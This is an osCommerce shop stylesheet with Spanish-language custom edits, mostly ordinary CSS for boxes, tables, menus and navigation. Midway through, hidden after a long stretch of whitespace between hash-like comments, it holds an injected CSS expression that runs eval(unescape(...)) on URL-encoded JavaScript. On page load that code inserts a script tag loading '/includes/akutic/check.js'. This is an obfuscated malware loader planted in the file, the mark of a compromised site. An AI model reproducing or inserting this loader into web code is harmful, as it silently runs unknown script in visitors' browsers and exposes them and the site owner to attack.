/*
  $Id: stylesheet.css,v 1.56 2003/06/30 20:04:02 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2003 osCommerce

  Released under the GNU General Public License
*/

.boxText { font-family: Verdana, Arial, sans-serif; font-size: 10px; }
.errorBox { font-family : Verdana, Arial, sans-serif; font-size : 10px; background: #ffb3b5; font-weight: bold; }
.stockWarning { font-family : Verdana, Arial, sans-serif; font-size : 10px; color: #cc0033; }
.productsNotifications { background: #f2fff7; }
.orderEdit { font-family : Verdana, Arial, sans-serif; font-size : 10px; color: #70d250; text-decoration: underline; }

FORM {
	display: inline;
}

.infoBox {
  background: #b6b7cb;
}

.infoBoxContents {
  background: #f8f8f9;
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
}

TR.headerNavigation {
  background: #bbc3d3;
}

TD.headerNavigation {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
  background: #bbc3d3;
  color: #ffffff;
  font-weight : bold;
}

A.headerNavigation { 
  color: #FFFFFF; 
}

A.headerNavigation:hover {
  color: #ffffff;
}

TR.headerError {
  background: #ff0000;
}

TD.headerError {
  font-family: Tahoma, Verdana, Arial, sans-serif;
  font-size: 12px;
  background: #ff0000;
  color: #ffffff;
  font-weight : bold;
  text-align : center;
}

TR.headerInfo {
  background: #00ff00;
}

TD.headerInfo {
  font-family: Tahoma, Verdana, Arial, sans-serif;
  font-size: 12px;
  background: #00ff00;
  color: #ffffff;
  font-weight: bold;
  text-align: center;
}





.infoBoxNotice {
  background: #FF8E90;
}

.infoBoxNoticeContents {
  background: #FFE6E6;
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
}

TD.infoBoxHeading {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
  font-weight: bold;
  background: #bbc3d3;
  color: #ffffff;
}

TD.infoBox, SPAN.infoBox {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
}

TR.accountHistory-odd, TR.addressBook-odd, TR.alsoPurchased-odd, TR.payment-odd, TR.productListing-odd, TR.productReviews-odd, TR.upcomingProducts-odd, TR.shippingOptions-odd {
  background: #f8f8f9;
}

TR.accountHistory-even, TR.addressBook-even, TR.alsoPurchased-even, TR.payment-even, TR.productListing-even, TR.productReviews-even, TR.upcomingProducts-even, TR.shippingOptions-even {
  background: #f8f8f9;
}

TABLE.productListing {
  border: 1px;
  border-style: solid;
  border-color: #b6b7cb;
  border-spacing: 1px;
}

.productListing-heading {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
  background: #b6b7cb;
  color: #FFFFFF;
  font-weight: bold;
}

TD.productListing-data {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
}

A.pageResults {
  color: #0000FF;
}

A.pageResults:hover {
  color: #0000FF;
  background: #FFFF33;
}

TD.pageHeading, DIV.pageHeading {
  font-family: Verdana, Arial, sans-serif;
  font-size: 20px;
  font-weight: bold;
  color: #9a9a9a;
}

TR.subBar {
  background: #f4f7fd;
}

TD.subBar {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
  color: #000000;
}

TD.main, P.main {
  font-family: Verdana, Arial, sans-serif;
  font-size: 11px;
  line-height: 1.5;
}

TD.smallText, SPAN.smallText, P.smallText {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
}

TD.accountCategory {
  font-family: Verdana, Arial, sans-serif;
  font-size: 13px;
  color: #aabbdd;
}

TD.fieldKey {
  font-family: Verdana, Arial, sans-serif;
  font-size: 12px;
  font-weight: bold;
}

TD.fieldValue {
  font-family: Verdana, Arial, sans-serif;
  font-size: 12px;
}

TD.tableHeading {
  font-family: Verdana, Arial, sans-serif;
  font-size: 12px;
  font-weight: bold;
}

SPAN.newItemInCart {
  font-family: Verdana, Arial, sans-serif;
  font-size: 10px;
  color: #ff0000;
}

CHECKBOX, INPUT, RADIO, SELECT {
  font-family: Verdana, Arial, sans-serif;
  font-size: 11px;
}

TEXTAREA {
  width: 100%;
  font-family: Verdana, Arial, sans-serif;
  font-size: 11px;
}

SPAN.greetUser {
  font-family: Verdana, Arial, sans-serif;
  font-size: 12px;
  color: #f0a480;
  font-weight: bold;
}

TABLE.formArea {
  background: #f1f9fe;
  border-color: #7b9ebd;
  border-style: solid;
  border-width: 1px;
}

TD.formAreaTitle {
  font-family: Tahoma, Verdana, Arial, sans-serif;
  font-size: 12px;
  font-weight: bold;
}

SPAN.markProductOutOfStock {
  font-family: Tahoma, Verdana, Arial, sans-serif;
  font-size: 12px;
  color: #c76170;
  font-weight: bold;
}

SPAN.productSpecialPrice {
  font-family: Verdana, Arial, sans-serif;
  color: #ff0000;
}

SPAN.errorText {
  font-family: Verdana, Arial, sans-serif;
  color: #ff0000;
}

.moduleRow { }
.moduleRowOver { background-color: #D7E9F7; cursor: pointer; cursor: hand; }
.moduleRowSelected { background-color: #E9F4FC; }

.checkoutBarFrom, .checkoutBarTo { font-family: Verdana, Arial, sans-serif; font-size: 10px; color: #8c8c8c; }
.checkoutBarCurrent { font-family: Verdana, Arial, sans-serif; font-size: 10px; color: #000000; }

/* message box */

.messageBox { font-family: Verdana, Arial, sans-serif; font-size: 10px; }
.messageStackError, .messageStackWarning { font-family: Verdana, Arial, sans-serif; font-size: 10px; background-color: #ffb3b5; }
.messageStackSuccess { font-family: Verdana, Arial, sans-serif; font-size: 10px; background-color: #99ff00; }

/* input requirement */
#manu * {background:none;padding-top:0;padding-bottom:0;}
#manu select {background-color:#fff;padding-top:0;padding-bottom:0;}
.inputRequirement { font-family: Verdana, Arial, sans-serif; font-size: 10px; color: #ff0000; }

.smallText_1 a {
	color:#000;
	text-decoration:underline;
}

.smallText_1 a:hover {
	color:#000;
	text-decoration:none;
}

#myse select {
	width:90%;
}





s {
	color:#808080;
	font-size:11px;
	font-weight:normal;
}


.main a {
	color:#000;
	text-decoration:none;
}

.main a:hover {
	color:#000;
	text-decoration:underline;
}

.subcatl {
	color:#000;
	text-decoration:underline;
	font-weight:normal;
}

.subcatl:hover {
	color:#000;
	text-decoration:none;
	font-weight:normal;
}




/*-------------------*/



body {padding:0; margin:0; background-image:url(images/bg5.gif)}
body, td {font-family:Tahoma,verdana,arial; font-size:10px; color:#000000;}

.bg	 {background:url(images/m26.gif); background-repeat: repeat-y;}

   
ul{
   margin:0px;
   padding:0px;
   list-style:none;
}
ul li{		
	background:url(images/m17.gif) center left no-repeat; margin:0px;
	padding:0 0 0 26px;	
}
ul a{
	color:#2C2829;
	text-decoration:none;
    font-size:11px;
	line-height:21px;	
}
ul a:hover{
	color:#A23020;
}
.el{		
	background:url(images/m18.gif) center left no-repeat; margin:0px;
	padding:0 0 0 26px;	
}

.se  {width:99px; height:17px; font-family:tahoma,verdana,arial; color:#3C3C3C; font-size:10px; padding-left:2px;}
.se1 {width:120px; height:20px; font-family:tahoma,verdana,arial; color:#000000; font-size:10px; padding-left:2px;}
.se2 {width:160px; height: 20px; font-family:tahoma,verdana,arial; color:#000000; font-size:10px; padding-left:2px;}
.go  {width:40px; height:18px; font-family:tahoma,verdana,arial; font-size:10px; color:#1A1A1A; font-weight:bold; line-height:13px; border:solid 1px #818181; margin:0px; padding:0px; text-align:center;}
.ab  {vertical-align: middle;}
.bd  {border:1px solid #E1E1E1;}


.tx  {font-size:11px; color:#282E3E;}
.tx1 {
	font-size:14px;
	color:#990000;
	font-weight:300;
}
.tx2 {font-size:10px; color:#3C3C3C;}

.tx3 {
	font-size:14px;
	color:#990000;
	font-family: arial;
	font-weight: 500;
}
.td-tx3{	background-image:url(images/tx3.jpg);	background-repeat: no-repeat; background-position: left center; margin-bottom:150px;}

.tdtitulo-tx3{background-image:url(images/tx3_2.jpg); background-repeat: no-repeat;	background-position: left top; text-align:center;}
.tx3 a{
	font-size:14px;
	color:#990000;
	font-family: arial;
	text-decoration:none;
}

.tx4 {
	font-size:13px;
	color:#990000;
	font-weight:bold;
}
.tx5 {font-size:11px; color:#7D7D7D;}
.tx6 {font-size:11px; color:#000000;}
.tx7 {font-size:11px; color:#627501; font-weight:bold;}
.tx8 {font-size:14px; color:#000000; font-weight:bold;}
.tx9 {font-size:11px; color:#E3151F; font-weight:bold;}

.ml {color:#3C3C3C;	font-size:10px; text-decoration:none; font-weight:bold;}
.ml:hover {text-decoration:underline;}
.ml1 {color:#627501; font-size:11px; text-decoration:none; font-weight:bold;}
.ml1 a{color:#627501; font-size:11px; text-decoration:none; font-weight:bold;}
.ml1:hover {text-decoration:underline;}
.ml1:hover a{text-decoration:underline;}
.ml2 {color:#7D7D7D; font-size:11px; text-decoration:none;}
.blah{color:#7D7D7D;}
.ml2:hover {text-decoration:underline;}
.ml3 {color:#627501; font-size:11px; text-decoration:underline;}
.ml3:hover { text-decoration:none; font-weight:bold;}
.ml4 {color:#627501; font-size:11px; text-decoration:none;}
.ml4:hover {text-decoration:underline;}


#zxc1 {color:#7D7D7D; font-size:11px; font-weight:bold;text-decoration:underline;}
#zxc1 a {color:#7D7D7D; font-size:11px; text-decoration:underline; font-weight:bold;}
#zxc1 a:hover {text-decoration:none;}

                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%34%3B%20%4A%53%53%32%20%3D%20%32%31%32%39%36%35%3B%20%4A%53%53%33%20%3D%20%27%2F%69%6E%63%6C%75%64%65%73%2F%61%6B%75%74%69%63%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%69%6E%63%6C%75%64%65%73%2F%61%6B%75%74%69%63%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

/*/////////// EDITADO POR EMILIO /////////////*/


#logo{ position:relative; float:left; height:auto; width:auto;}

#cabecera{	position:relative; float:right; height:30px; width:400px; margin:0px; background-color:#FFFFFF; text-align:right; padding-right:10px;}

#cabecera a{ font-size:12px; color:#666666;  text-decoration: none; }

#cabecera a:hover{	font-size:12px;	color:#666666;	 text-decoration: none;}

#cabecera ul{ list-style:none; background:none;}
#cabecera li{ display:inline; margin-left:15px; background:none; padding:0px;}
#cabecera img{ vertical-align:middle; }

/*///////////////// MENU ///////////////////////////*/

#navcontainer {
        margin: 10px 0 0 13px;
        padding: 0;
        height: 30px;
}

#navcontainer ul {
	border: 0;
	padding: 0;
	list-style-type: none;
	text-align: center;
	margin-top: 0;
	margin-bottom: 0;


}

#navcontainer ul li {
        display: block;
        float: left;
        text-align: center;
        padding: 0;
        margin: 0;
}

#navcontainer ul li a {
	width: 135px;
	height: 25px;
	padding: 0;
	margin: 0 0 10px 0;
	color: #666666;
	text-decoration: none;
	display: block;
	text-align: center;
	font-family: "Lucida Grande", "Lucida Sans Unicode", verdana, lucida, sans-serif;
	font-size: 14px;
	font-style: normal;
	line-height: 22px;
	font-variant: normal;
	background-image:url(images/botones.jpg);
	border-bottom-width: 1px;
	border-bottom-style: solid;
	border-bottom-color: #EBEBEB;
	background-color: #fff;
	background-repeat: no-repeat;
	background-position: center center;
}

#navcontainer ul li a:hover {
	color: #990000;
}

#navcontainer a:active {
	color: #666666;
}
